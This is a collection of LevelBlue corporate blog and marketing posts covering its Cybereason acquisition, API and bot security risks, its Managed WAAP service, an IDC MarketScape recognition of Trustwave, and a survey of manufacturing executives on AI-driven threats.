• Faster, Smarter Security: Integrating Cybereason XDR with Trustwave’s MDR and LevelBlue’s existing services provides a single, unified platform for threat detection and response, powered by elite human expertise and machine intelligence. 
• World-Class DFIR: Cybereason’s DFIR services, now combined with Stroz Friedberg, offer unrivaled global breach response and forensics for our clients, their legal counsel, and insurance partners. 
• Deeper Threat Intelligence: Merging Cybereason’s research with LevelBlue SpiderLabs provides broader visibility into emerging threat actors and novel attack vectors. 
• Unmatched Global Coverage: Cybereason’s strong presence in Japan and Continental Europe expands LevelBlue’s already extensive reach, supporting clients wherever they do business. 
• Seamless Integration for Any Stack: Whether organizations use Microsoft, SentinelOne, or hybrid environments, our approach will remain technology-agnostic – optimizing clients’ existing investments rather than forcing change. 

Backed by Strategic Investors and Leadership

This transaction brings renowned investors – SoftBank Corp., SoftBank Vision Fund 2, and Liberty Strategic Capital – into the LevelBlue fold, underscoring strong market confidence in our vision. We’re also welcoming Steven T. Mnuchin, former U.S. Treasury Secretary, to LevelBlue’s Board of Directors, bringing valuable experience at the crossroads of technology, finance, and policy. 

What’s Next 

Our focus is clear: immediate, uninterrupted service for every client, with even greater resources and innovation at their disposal. Both LevelBlue and Cybereason will continue to operate independently until closing, and we remain committed to serving our clients with excellence to advance their cyber objectives.  

Our expanded capabilities in XDR, MDR, DFIR, and threat intelligence will empower organizations to move from reactive to proactive cybersecurity, minimizing risk and enabling digital transformation with confidence. 

This is more than an acquisition. It is a strategic leap forward – uniting the best people, platforms, and partners to safeguard what matters most in an era of escalating cyber threats. As LevelBlue grows, our unwavering commitment to measurable security outcomes and long-term resilience for our clients remains our guiding purpose. 

On behalf of the entire LevelBlue team, thank you for your trust and partnership. The future is bright, and we’re just getting started. 
 

Organizations continue their digital transformation, with APIs now serving as the main communication links between applications, platforms, services, and partners. The widespread use of APIs introduces new security risks despite their common presence. The growing number of APIs significantly increases the cyber risks that security teams must address as they keep up with technological advances. The Akamai State of the Internet report shows that APIs made up more than 80% of internet traffic between 2023 and 2024. This major shift has exposed multiple security weaknesses as it has happened.

The main challenge organizations face is identifying and controlling their growing attack surface. The increase in APIs used creates multiple potential entry points for attackers. Externally accessible APIs often exist by mistake, allowing attackers to perform unauthorized actions and possibly causing data breaches and API exploitation. The problem gets harder because organizations often don’t have a clear view of their assets: shadow APIs, unknown endpoints, and undocumented interfaces stay hidden. Without a complete inventory, security teams are left in the dark and cannot fully protect their systems.

API security standardization remains inconsistent, causing major problems. The rush to deliver quickly often leads development teams to implement authentication and encryption policies carelessly. Many API releases still lack basic security measures.

API authentication and authorization systems encounter continuous security challenges. Protocols like OAuth and JWT provide robust frameworks, but their complexity can lead to implementation issues across many APIs. Improper implementation of these protocols creates security gaps that attackers can exploit for privilege escalation or unauthorized data access. The fast-paced DevOps environment heightens the risk of vulnerabilities. When APIs are updated, security settings often lag, causing configuration drift and introducing new security risks.

API security testing often receives inadequate attention from many organizations, raising serious concerns. APIs in applications usually undergo less thorough testing before launch compared to traditional software. This results in numerous security flaws, including business logic errors, data exposure vulnerabilities, and potential abuse attack scenarios, often remaining undetected. These vulnerabilities in APIs allow attackers to execute logic-based attacks, credential stuffing, and denial-of-service attacks, ultimately damaging services and increasing operational costs.

Security tools that rely on traditional methods struggle to detect threats targeting APIs specifically. Relying solely on perimeter defenses fails to catch common attacks that exploit payloads or injection flaws. Ensuring API encryption and managing keys adds extra complexity, especially when data moves through multiple cloud systems in hybrid environments.

The last challenge comes from the human factor. Organizations struggle because they lack the resources and specialized knowledge needed to defend APIs against threats. Securing APIs requires staff who understand application development, network security, and cloud architecture principles. Cybersecurity teams are often understaffed and lack the technical skills to handle all types of API threats.

LevelBlue Managed WAAP offers comprehensive API security with automated exposure detection, real-time threat intelligence, and data protection features, supported by Akamai’s industry-leading technology. The distinctive managed security solution detects suspicious API activities, blocks them, and monitors excessive queries to prevent abuse tactics like credential stuffing and site scraping before they can harm the business.

LevelBlue provides API security through expert-led services, combined with layered defenses, to make protection easier for users. This platform offers robust operational security through proactive monitoring and incident reporting, as well as off-hours configuration assistance to minimize the workload on internal teams. LevelBlue shifts WAAP from just a product to an active security strategy, allowing organizations to secure their APIs and drive secure innovation in their business.

LevelBlue Managed WAAP acts as a vital partner in environments where APIs serve as both business enablers and potential security threats, providing transparency along with management and protection against complex challenges. Unlike traditional tools, LevelBlue Managed WAAP offers a comprehensive management solution that addresses modern API security needs. Available in multiple tiers, it provides a solution for organizations of all sizes and security maturity levels to meet their application and API security goals.

Trustwave, a LevelBlue Company, was named a Leader in the IDC MarketScape: Asia/Pacific (Excluding Japan) Managed Detection and Response Services 2025 Vendor Assessment (doc # AP52998725e, September 2025).

The excerpt noted that Trustwave offers a comprehensive suite of security services that span MDR, MXDR, managed SIEM, co-managed SOC, threat hunting, DFIR, Security Colony, and threat intelligence services. These services are unified under a strategic vision to reduce cyber-risk for customers, enhance operational resilience, and deliver measurable security outcomes through a combination of proprietary platforms, expert-led services, and deep integration with partner technologies. 

“According to its clients, Trustwave has strong operational delivery, planning, and high-level design, which are ‘well thought of and considered top strengths (for Trustwave,)’” the IDC MarketScape noted. “A client commented that Trustwave ‘people are very good, proactive, and responsive;’ and another client said, ‘its penetration testing people will deliver things above and beyond.’”

The analyst firm’s excerpt further noted that enterprises should consider Trustwave for its strong and deep expertise in the Microsoft stack, leveraging globally recognized solutions with local and regional expertise. Trustwave's threat intelligence capabilities, which leverage the experience and expertise of SpiderLabs elite threat intelligence and research, allow customers to access world-class threat detection tools, techniques, and processes for greater business impact.

IDC MarketScape Highlights Trustwave’s Strengths 

The IDC MarketScape listed numerous areas where Trustwave stands out in the MDR vendor community. These included Trustwave’s comprehensive suite of security services that span MDR, MXDR, managed SIEM, co-managed SOC, threat hunting, DFIR, Security Colony, and threat intelligence services.

Other Trustwave features called out included:

• Trustwave’s considerable presence in Australia, New Zealand, Singapore, Malaysia, the Philippines, and Hong Kong, supporting customers in industries such as financial services, telecommunications and media, government/public sectors, retail, energy and utilities, education, and life sciences.
• Trustwave's security capabilities encompass the full spectrum of threat detection, starting with MDR and MXDR, providing real-time monitoring and response across endpoints, networks, and cloud environments, leveraging Trustwave's proprietary Fusion platform, SpiderLabs threat intelligence, and advanced threat hunting aligned with MITRE ATT&CK.
• Trustwave's DFIR services provide 24x7 emergency breach response, forensic investigations, impact assessments, and litigation support. In addition, the advanced threat hunting service operates across multiple EDR platforms to detect adversarial behaviours that evade traditional controls.
• Trustwave also introduced new service expansions to its MDR portfolio to support the increased demand from its clients for Microsoft Security. New services were designed to reduce complexity, lower risk of transition, and maximize customer's investment in Microsoft Security.

Get the Excerpt

Picture your online shopping site overwhelmed with fake orders, your customer accounts being drained one after another, or your essential APIs flooded by an endless wave of automated attacks. This is the reality businesses face today—thanks to a fully automated army of cyber criminals determined to cause harm. In this digital bot invasion, businesses of all kinds are under urgent pressure to establish defenses that effectively fight this digital threat.

As digital transformation accelerates and attack surfaces expand, bots are becoming increasingly advanced, automated, and more difficult to detect. Automated threats—from account takeovers to data scraping and fraud—are increasingly challenging, making it difficult for many organizations to keep up. Consider, for a moment, these examples.

• Online Retailers: Account takeovers not only result in financial losses due to fraudulent purchases but also lead to a significant erosion of customer trust when personal data is compromised.
• Travel Sites: Data scraping can undermine competitive advantage as rivals steal pricing information, leading to reduced revenue and serious harm to the business’s viability.
• Financial Institutions: API exploits can expose sensitive financial data, leading to regulatory fines, significant reputational damage, and a decline in customer trust.

The nature of these threats is evolving quickly. Advanced bots are increasingly mimicking human behavior, which allows them to bypass traditional security measures and makes it harder to identify whether a user or an automated program is involved in suspicious activity. This issue is widespread: according to a 2025 study by ESG Research, threats from web applications and APIs involving bots are among the most common, with organizations ranking them alongside malware as a top concern for the next 12 to 24 months.

It's clear why this is the case. The same ESG study showed that most organizations (68%) are employing specialized bot management tools, understanding that traditional solutions are no longer enough against sophisticated modern bot threats. While some still rely on basic WAF-based bot features, an increasing number, especially enterprises, are choosing advanced, purpose-built solutions. These trends highlight a growing recognition that bots pose a serious risk to both security and business continuity.

The rapid growth of APIs heightens the challenge. APIs foster innovation and digital flexibility, but they also create a significant, mostly unprotected attack surface. As APIs are used more and integrated into more applications, they become increasingly attractive targets for bot-driven exploits. ESG’s research supports this: fully 80% of organizations now report that more than half of their applications use APIs, and API security incidents are an escalating concern.

Scalability remains a key concern. As traffic volumes rise, especially during events, promotions, or peak business cycles, bot detection must scale without losing performance. However, limited resources and expertise often hinder this flexibility. In fact, nearly half of all respondents in ESG’s research said that protecting web applications has become more difficult than two years ago. They pointed to the shift to cloud technologies, modern development practices, and a growing API footprint as the main reasons. Additionally, not all organizations enjoy seamless collaboration among security, fraud, and DevOps teams. According to the ESG survey, 44% of organizations say their security and fraud/e-commerce teams work together on bot mitigation only quarterly or less. This siloing within different parts of the organization adds another layer to the story of ineffective defenses. 

Turning the Tide: How LevelBlue Managed WAAP Redefines Bot Defense

Bots are more than just a technical problem; they also pose a strategic threat. When it comes to APIs, web applications, or customer-facing interfaces, today's bots are smarter, faster, and more difficult to detect. They operate in ways that are not easily noticed by you or your customers. But in the hidden areas where they function, they threaten the core trust that your enterprise relies on to build relationships with customers and partners.

LevelBlue's Managed WAAP was created with this reality in mind. Our solution offers a modern approach to bot security, helping enterprises shift from a purely defensive stance to one of proactive control. In the complex field of web application and API security, LevelBlue Managed WAAP stands out — not just for utilizing advanced technology but also for operational excellence, which turns technological capabilities into real-world security for our clients. We maintain strong integration with threat intelligence that helps us stay ahead of emerging threats. However, our true differentiator is the operational expertise in managing web application security, ensuring our approach is proactive and that peace of mind is our standard.

LevelBlue Managed WAAP begins defending against sophisticated bot attacks by utilizing the powerful Akamai App & API Protector. This leading market solution offers complete protection against complex automated threats through its multi-layered detection and mitigation features. Its advanced behavioral analytics identify bot activity that closely mimics human behavior. Additionally, it uses edge-deployed controls to stop bots near their source, reducing the impact on your applications and APIs while ensuring that the solution halts bots without disrupting legitimate users.

Additionally, LevelBlue Managed WAAP continuously integrates advanced threat intelligence with its core technological functions. LevelBlue ensures that your WAAP instance is configured using the latest intelligence from the changing threat landscape. This means that as we see threat actors displaying increasingly sophisticated behaviors, your WAAP setup becomes better at telling good actors from bad ones and responding appropriately.

Importantly, LevelBlue extends beyond the technological layer. The LevelBlue Security Operations Center (SOC) acts as an extension of your security team, providing ongoing monitoring, expert configuration, threat detection, and incident response. To improve the service further, LevelBlue offers strategic advisory services, including regularly scheduled meetings with the LevelBlue service delivery team to review your service and suggest updates for both the LevelBlue Managed WAAP service and your internal security strategy.

LevelBlue Managed WAAP helps organizations of all sizes:

• Dramatically reduce fraud and abuse related to bots, like credential stuffing, scraping, and automated attacks—issues that can cost businesses millions.
• Maintain the integrity—the performance and availability—of your smart digital experiences while delivering optimized security for your unique environment.
• Improve visibility into your API and application traffic, enabling faster identification and mitigation of malicious bot behavior. 
• Provide a scalable and adaptive solution to handle sharp increases in demand without compromising either security or service quality.
• Reduce operational burden with expert-led services, eliminating the complexity of bots.

In an environment where bots have become the primary means of exploitation, LevelBlue Managed WAAP offers more than just protection; it delivers peace of mind. It enables security teams to take control, build defenses, and protect business outcomes in a landscape dominated by bots.

Don't let bots control your digital future. Contact LevelBlue today for a free consultation and learn how our Managed WAAP can help you regain control of your web applications and APIs.

Manufacturing executives recently surveyed by LevelBlue expressed a deep concern that emerging attack methods, such as deepfakes and AI-powered attacks, will be almost as likely as more traditional attacks like ransomware.

We derived the information from a research-based survey conducted in January 2025, which included 220 C-suite and senior manufacturing executives. The complete survey results can be found in LevelBlue’s newly released 2025 Spotlight Report: Cyber Resilience and Business Impact in Manufacturing.

The Growing Threat of AI-Enhanced Cyberattacks

AI has become what is commonly called a force multiplier for threat actors, essentially allowing them to do more with less.

The survey found that 47% expected a deepfake and synthetic identity attack to occur within the next year, while 44% anticipated an AI-powered attack.

Some of the areas where AI is supercharging adversary capabilities are:

• Accelerate vulnerability discovery and exploitation through automated ransomware and phishing campaigns.
• Craft highly convincing phishing lures that are tailored and more difficult to detect.
• Create deepfakes and synthetic identities to fuel fraud schemes.
• Develop new variants of malware designed to bypass traditional security systems.

While manufacturers acknowledge these looming dangers, readiness remains low, with only 32% reporting that they are prepared for AI-powered attacks, and just 30% feel equipped to defend against deepfake or synthetic identity threats.

At the same time, geopolitical instability is fueling another wave of cyber risk. Nation-state actors and hacktivist groups are launching large-scale distributed denial of service (DDoS) attacks to disrupt critical infrastructure.

These attacks, which overwhelm systems with massive volumes of traffic, are not new; they’ve been a staple of the Internet for decades, but today, attackers are scaling their impact by leveraging insecure IoT devices to build massive botnets.

Even so, only 37% of manufacturing executives report being prepared for a DDoS attack.

Where Manufacturers Are Investing

Despite these challenges and shortfalls in some areas, manufacturers are making progress in shoring up their defenses. Many are channeling resources into machine learning and cyber resilience, reflecting a growing recognition that modern defenses must be dynamic and business-wide.

The top five areas for significant investment are:

• Machine learning for pattern matching – 71%
• Cyber resilience processes across the business – 69%
• Generative AI defenses against social engineering – 64%
• Application security – 67%
• Software supply chain security – 63%

Encouragingly, these priorities show strong alignment with broader enterprise security trends. However, only 34% of manufacturers are significantly investing in Zero Trust Architecture (ZTA) — a framework that could help prevent lateral movement, detect anomalies quickly, and instill resilient behaviors across the workforce.

Why Stand Alone?

Manufacturing organizations are increasingly recognizing that they can’t go it alone. The complexity of modern cyber threats requires external expertise, and many manufacturers are turning to outside partners for help.

38% expect to enlist cybersecurity consultants in the next two years — up slightly from the 36% who have already done so.

40% plan to seek guidance from cyber insurance advisors, compared with only 29% who engaged them in the past year.

These shifts reflect a growing awareness that proactive resilience isn’t just about technology investments — it’s also about guidance, planning, and shared accountability.

Bringing It All Together

The manufacturing sector is at a pivotal moment. AI-driven cyberattacks, deepfakes, DDoS campaigns, and supply chain vulnerabilities are already reshaping the security landscape, and adversaries are evolving faster than defenses.

While investments in machine learning and cyber resilience are promising, manufacturers must go further by embracing Zero Trust, strengthening IoT security, and leaning on expert partners who can help them stay ahead of adversaries.

The threats are imminent, but with a proactive and holistic approach, manufacturers can close the readiness gap and secure their operations against the next generation of cyberattacks.